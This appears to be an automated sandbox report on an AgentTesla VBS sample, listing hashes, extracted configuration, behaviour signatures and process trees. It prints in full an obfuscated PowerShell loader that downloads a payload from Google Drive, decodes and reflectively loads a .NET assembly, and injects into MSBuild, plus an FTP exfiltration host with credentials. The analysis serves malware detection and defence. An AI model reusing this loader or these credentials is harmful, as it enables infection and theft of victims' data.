Analysis
-
max time kernel
133s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 02:16
Static task
static1
Behavioral task
behavioral1
Sample
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs
Resource
win7-20240903-en
General
-
Target
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs
-
Size
140KB
-
MD5
cbcf626e71d764c178148e4637e333af
-
SHA1
c3e2615fea0051e63e817c7ad9cc17b59d6da776
-
SHA256
270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff
-
SHA512
da100c32335caf638e6ccdb0ec37c6e0c6596dfc98b09ef7c39c20911ddadc4576adb67e58187a008be6183bf7cfe89646558bb9abed10374d9e9c5902111fb3
-
SSDEEP
3072:ky7jgt5pEGwprytIsaK18meFZjcrsmiYADap1Ff:KRQjcQmiMp1Ff
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.stingatoareincendii.ro - Port:
21 - Username:
[email protected] - Password:
3.*RYhlG)lkA
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 9 5004 powershell.exe 13 5004 powershell.exe 34 5004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1132 powershell.exe 5004 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 9 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5004 set thread context of 3612 5004 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1132 powershell.exe 1132 powershell.exe 5004 powershell.exe 5004 powershell.exe 3612 MSBuild.exe 3612 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 3612 MSBuild.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4936 wrote to memory of 1132 4936 WScript.exe 84 PID 4936 wrote to memory of 1132 4936 WScript.exe 84 PID 1132 wrote to memory of 5004 1132 powershell.exe 86 PID 1132 wrote to memory of 5004 1132 powershell.exe 86 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97 PID 5004 wrote to memory of 3612 5004 powershell.exe 97
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdWICcqbURyKicpLm5hbUVbMywxMSwyXS1KT2luJycpKCgnZHZ1aW1hJysnZ2VVcmwgPSBGZ2EnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBGZ2E7ZHZ1d2ViQ2xpZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtkdnVpbWFnZUJ5dGVzID0gZHZ1d2ViQ2xpZW50LkQnKydvd25sb2FkRGF0YShkdnVpbWFnZVVybCknKyc7JysnZHZ1JysnaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC4nKydHZXRTJysndHJpbmcoZHZ1aW1hZ2VCeXRlJysncyk7ZHZ1c3RhcnRGbGFnID0gRmdhPDxCQVNFNjRfU1RBUlQnKyc+PkZnYTtkdnVlbmRGbGFnID0gRmdhPDxCQVNFNjRfRU5EPj5GZ2E7ZHZ1c3RhcnRJbmRleCA9IGR2dWltYWdlVGV4dC5JbmRleE9mKGR2dXN0YXJ0RmxhZyk7ZHZ1ZW5kSW5kZXggPSBkdnVpbWFnZVRleHQuSW5kZXhPZihkdnVlbmRGbGEnKydnKTtkdnVzdGFydEluZGV4IC1nZSAwIC1hbmQgZHZ1ZW5kSW5kZXggLWd0IGR2dXN0YXJ0SW5kZXg7ZHZ1c3RhcnRJbmRleCArPSBkdnVzdGFydEZsYWcuTCcrJ2VuZ3RoO2R2dWJhc2U2NExlbmd0aCA9IGR2dWVuZEluZGV4IC0gZHZ1c3RhcnRJbmRleDtkdnViYXNlNjRDb21tYW5kID0gZHZ1aW1hZ2VUZXh0LlN1YnN0cmluZyhkdnVzdGFydEluZGV4LCBkdnUnKydiYXNlNjRMZW5ndGgpO2R2dWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGR2dWJhc2U2NENvbW1hbmQuVG9DaGFyQXInKydyYXkoKSBiSFogRm9yRWFjaC1PYmplY3QgeyBkdnVfIH0pWy0xLi4tKGR2dWJhcycrJ2U2NENvbW1hbmQuTGVuZ3RoKV07ZHZ1Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhkdnViYXNlNjRSZXZlcnNlZCk7ZHZ1bG9hZGVkQXNzZScrJ21ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGR2dWNvbW1hbmRCeXRlcyk7ZHZ1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChGZ2FWQUlGZ2EpO2R2dXZhaU1ldGhvZC5JbnZva2UoZHZ1bnVsbCwgQChGZ2F0eHQub29vb2RlZXZ2di8zODEuMTQyLjk0MS41NC8vOnB0dGhGZ2EsIEZnYScrJ2Rlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYU1TQnVpbGRGZ2EsICcrJ0ZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aScrJ3ZhZG9GZ2EsRmdhZGVzYXRpJysndmFkb0ZnYSxGJysnZycrJ2FkZXNhdGl2YScrJ2RvRmdhLEZnYWRlc2F0aXZhZG9GZ2EsRmdhZGVzYXRpdmFkb0ZnYSxGZ2FkZXNhdGl2YWRvRmdhLEZnYTFGZ2EsRmdhZGVzYXRpdmFkb0ZnYSkpOycpLnJlcGxBY0UoJ2JIWicsJ3wnKS5yZXBsQWNFKChbY2hhcl0xMDArW2NoYXJdMTE4K1tjaGFyXTExNyksJyQnKS5yZXBsQWNFKCdGZ2EnLFtzdHJpbmddW2NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gV '*mDr*').namE[3,11,2]-JOin'')(('dvuima'+'geUrl = Fga'+'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 Fga;dvuwebClien'+'t = New-Object System.Net.WebClient;dvuimageBytes = dvuwebClient.D'+'ownloadData(dvuimageUrl)'+';'+'dvu'+'imageText = [System.Text.Encoding]::UTF8.'+'GetS'+'tring(dvuimageByte'+'s);dvustartFlag = Fga<<BASE64_START'+'>>Fga;dvuendFlag = Fga<<BASE64_END>>Fga;dvustartIndex = dvuimageText.IndexOf(dvustartFlag);dvuendIndex = dvuimageText.IndexOf(dvuendFla'+'g);dvustartIndex -ge 0 -and dvuendIndex -gt dvustartIndex;dvustartIndex += dvustartFlag.L'+'ength;dvubase64Length = dvuendIndex - dvustartIndex;dvubase64Command = dvuimageText.Substring(dvustartIndex, dvu'+'base64Length);dvubase64Reversed = -join (dvubase64Command.ToCharAr'+'ray() bHZ ForEach-Object { dvu_ })[-1..-(dvubas'+'e64Command.Length)];dvucommandByt'+'es = [System.Convert]::FromBase64String(dvubase64Reversed);dvuloadedAsse'+'mbly = [System.Reflection.Assembly]::Load(dvucommandBytes);dvuvaiMethod = [dnlib.IO.Home].GetMethod(FgaVAIFga);dvuvaiMethod.Invoke(dvunull, @(Fgatxt.oooodeevvv/381.142.941.54//:ptthFga, Fga'+'desativadoFga, FgadesativadoFga, FgadesativadoFga, FgaMSBuildFga, '+'FgadesativadoFga, Fgadesati'+'vadoFga,Fgadesati'+'vadoFga,F'+'g'+'adesativa'+'doFga,FgadesativadoFga,FgadesativadoFga,FgadesativadoFga,Fga1Fga,FgadesativadoFga));').replAcE('bHZ','|').replAcE(([char]100+[char]118+[char]117),'$').replAcE('Fga',[string][char]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82